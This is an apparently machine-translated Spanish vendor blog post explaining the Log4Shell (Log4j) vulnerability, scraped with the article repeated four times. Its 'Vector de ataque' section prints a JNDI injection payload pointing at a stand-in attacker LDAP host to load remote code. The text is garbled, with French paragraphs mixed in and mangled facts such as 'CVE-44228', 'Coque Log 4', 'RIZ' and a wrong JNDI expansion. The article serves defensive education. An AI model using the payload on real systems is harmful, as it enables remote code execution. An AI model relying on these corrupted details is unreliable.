Iconos SCW
héroe bg sin separador
Blog

La vulnerabilidad Log4j explicada: su vector de ataque y cómo prevenirlo

Laura Verheyde
Publicado el 16 de enero de 2022
Última actualización el 6 de marzo de 2026

El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.

¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?

Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.

¿Noticias viejas?

La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.

Vector de ataque

La carga útil de inyección de Log4Shell se parece a esto:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.

Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.

Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».

Prevención: concienciación

La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.

Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.

¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.

Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.

Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.

Mejore sus habilidades en materia de defensa contra Log4Shell

¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.


Mostrar el recurso
Mostrar el recurso

En diciembre de 2021, se reveló una falla de seguridad crítica llamada Log4Shell en la biblioteca Java Log4j. En este artículo, presentamos la vulnerabilidad Log4Shell de la manera más sencilla para que puedas comprender los conceptos básicos y te proponemos una misión: un campo de pruebas donde puedes intentar explotar un sitio web simulado utilizando el conocimiento de esta vulnerabilidad.

¿Desea obtener más información?

Más información

Secure Code Warrior aquí para ayudar a su organización a proteger el código a lo largo de todo el ciclo de desarrollo de software y a crear una cultura en la que la ciberseguridad sea una prioridad. Tanto si es responsable de la seguridad de las aplicaciones, desarrollador, responsable de la seguridad informática o cualquier otra persona involucrada en la seguridad, podemos ayudar a su organización a reducir los riesgos asociados a un código no seguro.

Reserve una demostración
Compartir en:
marcas de LinkedInSocialx logotipo
Autor
Laura Verheyde
Publicado el 16 de enero de 2022

Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.

Compartir en:
marcas de LinkedInSocialx logotipo

El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.

¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?

Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.

¿Noticias viejas?

La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.

Vector de ataque

La carga útil de inyección de Log4Shell se parece a esto:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.

Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.

Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».

Prevención: concienciación

La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.

Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.

¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.

Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.

Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.

Mejore sus habilidades en materia de defensa contra Log4Shell

¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.


Mostrar el recurso
Mostrar el recurso

Rellene el siguiente formulario para descargar el informe.

Nos gustaría obtener su autorización para enviarle información sobre nuestros productos y/o sobre temas relacionados con la codificación segura. Siempre trataremos sus datos personales con el mayor cuidado y nunca los venderemos a otras empresas con fines de marketing.

Enviar
Icono de éxito de SCW
Icono de error scw
Para enviar el formulario, active las cookies «Analytics». No dude en desactivarlas de nuevo una vez que haya terminado.

El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.

¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?

Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.

¿Noticias viejas?

La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.

Vector de ataque

La carga útil de inyección de Log4Shell se parece a esto:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.

Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.

Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».

Prevención: concienciación

La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.

Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.

¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.

Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.

Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.

Mejore sus habilidades en materia de defensa contra Log4Shell

¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.


Ver el seminario web
Comience
Más información

Haga clic en el enlace siguiente y descargue el PDF de este recurso.

Secure Code Warrior aquí para ayudar a su organización a proteger el código a lo largo de todo el ciclo de desarrollo de software y a crear una cultura en la que la ciberseguridad sea una prioridad. Tanto si es responsable de la seguridad de las aplicaciones, desarrollador, responsable de la seguridad informática o cualquier otra persona involucrada en la seguridad, podemos ayudar a su organización a reducir los riesgos asociados a un código no seguro.

Mostrar el informeReserve una demostración
Descargar el PDF
Mostrar el recurso
Compartir en:
marcas de LinkedInSocialx logotipo
¿Desea obtener más información?

Compartir en:
marcas de LinkedInSocialx logotipo
Autor
Laura Verheyde
Publicado el 16 de enero de 2022

Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.

Compartir en:
marcas de LinkedInSocialx logotipo

El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.

¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?

Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.

¿Noticias viejas?

La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.

Vector de ataque

La carga útil de inyección de Log4Shell se parece a esto:

$ {jndi:ldap : //attacker.host/xyz}

Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.

A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.

Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.

Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».

Prevención: concienciación

La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.

Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.

¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.

Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.

Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.

Mejore sus habilidades en materia de defensa contra Log4Shell

¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.


Índice

Descargar el PDF
Mostrar el recurso
¿Desea obtener más información?

Más información

Secure Code Warrior aquí para ayudar a su organización a proteger el código a lo largo de todo el ciclo de desarrollo de software y a crear una cultura en la que la ciberseguridad sea una prioridad. Tanto si es responsable de la seguridad de las aplicaciones, desarrollador, responsable de la seguridad informática o cualquier otra persona involucrada en la seguridad, podemos ayudar a su organización a reducir los riesgos asociados a un código no seguro.

Reserve una demostraciónDescargar
Compartir en:
marcas de LinkedInSocialx logotipo
Centro de recursos

Recursos para ayudarle a empezar

Más publicaciones
Centro de recursos

Recursos para ayudarle a empezar

Más publicaciones